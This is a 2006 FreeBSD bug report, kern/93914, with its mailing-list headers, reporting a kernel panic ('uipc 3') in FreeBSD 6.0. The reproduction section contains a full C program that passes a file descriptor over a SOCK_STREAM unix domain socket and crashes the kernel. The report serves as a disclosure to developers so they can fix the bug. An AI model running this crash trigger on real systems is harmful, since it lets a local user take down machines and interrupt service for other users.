From owner-freebsd-bugs@FreeBSD.ORG Mon Feb 27 21:20:22 2006 Return-Path: X-Original-To: freebsd-bugs@hub.freebsd.org Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8C09016A420 for ; Mon, 27 Feb 2006 21:20:22 +0000 (GMT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9AFB843D68 for ; Mon, 27 Feb 2006 21:20:11 +0000 (GMT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.13.4/8.13.4) with ESMTP id k1RLK34D099744 for ; Mon, 27 Feb 2006 21:20:03 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.13.4/8.13.4/Submit) id k1RLK2OM099739; Mon, 27 Feb 2006 21:20:02 GMT (envelope-from gnats) Resent-Date: Mon, 27 Feb 2006 21:20:02 GMT Resent-Message-Id: <200602272120.k1RLK2OM099739@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Christian Biere Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B601D16A420 for ; Mon, 27 Feb 2006 21:14:11 +0000 (GMT) (envelope-from christianbiere@gmx.de) Received: from mail.gmx.net (mail.gmx.de [213.165.64.20]) by mx1.FreeBSD.org (Postfix) with SMTP id B7B3A43D49 for ; Mon, 27 Feb 2006 21:14:10 +0000 (GMT) (envelope-from christianbiere@gmx.de) Received: (qmail invoked by alias); 27 Feb 2006 21:14:08 -0000 Received: from reverse-82-141-49-115.dialin.kamp-dsl.de (EHLO localhost) [82.141.49.115] by mail.gmx.net (mp017) with SMTP; 27 Feb 2006 22:14:08 +0100 Message-Id: <20060227211447.GA5140@cyclonus> Date: Mon, 27 Feb 2006 22:14:47 +0100 From: Christian Biere To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Cc: Subject: kern/93914: panic: uipc 3 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 27 Feb 2006 21:20:22 -0000 >Number: 93914 >Category: kern >Synopsis: panic: uipc 3 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Feb 27 21:20:02 GMT 2006 >Closed-Date: >Last-Modified: >Originator: Christian Biere >Release: FreeBSD 6.0-RELEASE-p4 i386 >Organization: >Environment: System: FreeBSD vs04 6.0-RELEASE-p4 FreeBSD 6.0-RELEASE-p4 #0: Thu Feb 9 15:02:18 CET 2006 jonsonn@elaine.jbhosting.de:/usr/obj/usr/src/sys/GENERIC i386 >Description: By sending a datagram with a control message over a unix domain socket to a unix domain socket of type SOCK_STREAM it is possible to cause a kernel panic. >How-To-Repeat: $ cat > uipc3.c < #include #include #include #include #include #include #include #include #include #include #include #define ARRAY_LEN(x) (sizeof (x) / sizeof (x)[0]) static int set_socket_address(struct sockaddr_un *sun, const char *path) { static const struct sockaddr_un zero_sun; assert(sun); assert(path); *sun = zero_sun; if (strlen(path) >= sizeof sun->sun_path) { fprintf(stderr, "sockpath is too long\n"); return -1; } strncpy(sun->sun_path, path, sizeof sun->sun_path); sun->sun_len = SUN_LEN(sun); return 0; } static int create_new_socket(int stype) { int fd; fd = socket(PF_LOCAL, stype, 0); if (-1 == fd) { perror("socket(PF_LOCAL, ..., 0)"); return -1; } return fd; } static int send_msg(const int fd, const char * const dst_path, const struct msghdr * const msg_ptr) { struct msghdr msg; struct sockaddr_un sun; assert(-1 != fd); assert(dst_path); assert(msg_ptr); if (set_socket_address(&sun, dst_path)) return -1; msg = *msg_ptr; msg.msg_name = &sun; msg.msg_namelen = sizeof sun; if ((ssize_t) -1 == sendmsg(fd, &msg, 0)) { perror("sendmsg()"); return -1; } return 0; } static int send_descriptors(const int fd, const char * const dst_path, const int * const fd_array, const size_t num_fds) { static const struct cmsghdr zero_cmsg; static const struct msghdr zero_msg; static struct iovec iov[1]; struct msghdr msg; struct cmsghdr *cmsg; size_t data_size; ssize_t ret; assert(-1 != fd); assert(dst_path); assert(fd_array); data_size = num_fds * sizeof fd_array[0]; cmsg = malloc(CMSG_SPACE(data_size)); if (!cmsg) { perror("malloc()"); return -1; } *cmsg = zero_cmsg; cmsg->cmsg_len = CMSG_LEN(data_size); cmsg->cmsg_level = SOL_SOCKET; cmsg->cmsg_type = SCM_RIGHTS; memcpy((char *) cmsg + CMSG_LEN(0), fd_array, data_size); msg = zero_msg; msg.msg_iov = iov; msg.msg_iovlen = ARRAY_LEN(iov); msg.msg_control = cmsg; msg.msg_controllen = CMSG_LEN(data_size); ret = send_msg(fd, dst_path, &msg); free(cmsg); return ret; } void usage(void) { printf("uipc3 PATH\n"); exit(EXIT_FAILURE); } int main(int argc, char *argv[]) { int s; if (argc != 2) usage(); s = create_new_socket(SOCK_STREAM); if (-1 == s) exit(EXIT_FAILURE); { int fd; fd = STDOUT_FILENO; send_descriptors(s, argv[1], &fd, 1); } return 0; } /* vi: set ai et ts=2 sts=2 sw=2 cindent: */ EOF >Fix: >Release-Note: >Audit-Trail: >Unformatted: